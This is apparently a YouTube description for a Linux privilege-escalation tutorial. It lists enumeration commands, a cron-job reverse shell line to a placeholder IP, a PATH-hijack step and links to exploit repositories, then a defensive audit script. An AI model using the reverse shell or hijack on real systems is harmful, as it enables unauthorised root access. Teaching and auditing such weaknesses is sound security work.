Get Started With Ethical Hacking: Linux Privilege Escalation (Part 1)
In this video, we dive deep into post-exploitation techniques to escalate privileges after landing a reverse shell. From kernel exploits to weak file permissions, I cover many key methods to gain root access. Learn how to manipulate SUID/SGID binaries, abuse Linux capabilities, exploit misconfigured cron jobs, and much more. Whether you're a beginner or an experienced ethical hacker, this guide will help you better understand the art of privilege escalation. Like and subscribe for more hacking tutorials!

Check me out: https://linktr.ee/lukedexter
Discord: https://discord.gg/EGDKsAaeZc
LinkedIn Article: https://www.linkedin.com/pulse/15-default-linux-commands-manual-privilege-escalation-luke-dexter-p--zlgae/

Side note: YouTube won't allow angle brackets in the commands below, so I've replaced them with (ab) below.

Commands Covered in This Video:

uname -a
uname -r
Displays the current kernel version and other information.

cat /proc/version
Shows detailed information about the kernel, compiler, and build time.

cat /etc/*release
Displays the distribution name and version information.

arch / getconf LONG_BIT
Determines whether the system is 32-bit or 64-bit.

searchsploit linux kernel version priv esc
Searches for kernel privilege escalation exploits based on the version.

find / -perm -u=s -type f 2(ab)/dev/null
Searches for all files with SUID permissions, which can allow privilege escalation.

find / -perm /6000 2(ab)/dev/null | grep '/bin/'
Searches for files with either SUID or SGID permissions whose path contains /bin/. The slash before 6000 matters: without it, find matches only files whose mode is exactly 6000.

find / -perm -o+w -perm -o+x -type f 2(ab)/dev/null
Locates files that are world-writable and world-executable, which can be a security risk.

sudo -l
Lists the allowed sudo commands for the current user, revealing potential privilege escalation paths.

getcap -r / 2(ab)/dev/null | grep -E 'cap_setuid|cap_setgid|cap_dac_read_search|cap_dac_override|cap_sys_admin|cap_sys_module|cap_net_admin|cap_net_raw'
Finds binaries with dangerous capabilities, which can be exploited for privilege escalation.

echo "bash -i (ab)& /dev/tcp/your_IP/port 0 (ab)&1" (double ab) /etc/cron.d/vulnerable_cron
Exploits a writable cron job by appending a reverse shell command.

export PATH=/tmp:$PATH
Prepends /tmp to the $PATH variable so that a malicious script placed there is found before system binaries of the same name, tricking the system into executing it.

Important Resources:

Dirtycow Exploit: https://github.com/FireFart/dirtycow/blob/master/README.md
Pre-Compiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits
GTFOBins: https://gtfobins.github.io/

Join me in this deep dive to master privilege escalation techniques after gaining a foothold through a reverse shell. Don't forget to like and subscribe for more hacking content!

#privilegeescalation #ethicalhacking #cybersecurity #reverseshell #pentesting
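The same checks from the administrator's side, as an added example that is not from the video: a small POSIX shell audit that reports SUID/SGID files, world-writable cron entries, and unsafe $PATH entries so they can be fixed before anyone abuses them. The function names and the root-prefix argument are assumptions of this example.

```shell
#!/bin/sh
# Added example: defender-side audit of the misconfigurations listed above.
# Function names and the root-prefix argument are assumptions of this example.

# SUID or SGID regular files under directory $1 (either bit set).
audit_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# World-writable cron files and directories. $1 is a root prefix:
# "" for the live system, or the path of a mounted image or test tree.
audit_cron_writable() {
    for p in etc/crontab etc/cron.d etc/cron.hourly etc/cron.daily \
             etc/cron.weekly etc/cron.monthly; do
        [ -e "$1/$p" ] || continue
        find "$1/$p" \( -type f -o -type d \) -perm -0002 2>/dev/null
    done | sort
}

# PATH entries ($1 = PATH-style string) that let another user plant a
# binary: world-writable directories, and relative or empty entries
# (an empty entry means the current directory).
audit_path() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        case $d in
            /*) # -H resolves a symlinked entry such as /bin before testing it
                if [ -n "$(find -H "$d" -prune -type d -perm -0002 2>/dev/null)" ]; then
                    echo "world-writable: $d"
                fi ;;
            *)  echo "relative-or-empty: '$d'" ;;
        esac
    done
}
```

On a live host, run `audit_setid /`, `audit_cron_writable ""` and `audit_path "$PATH"` (as root for full coverage) and compare the SUID/SGID list against the distribution's expected set.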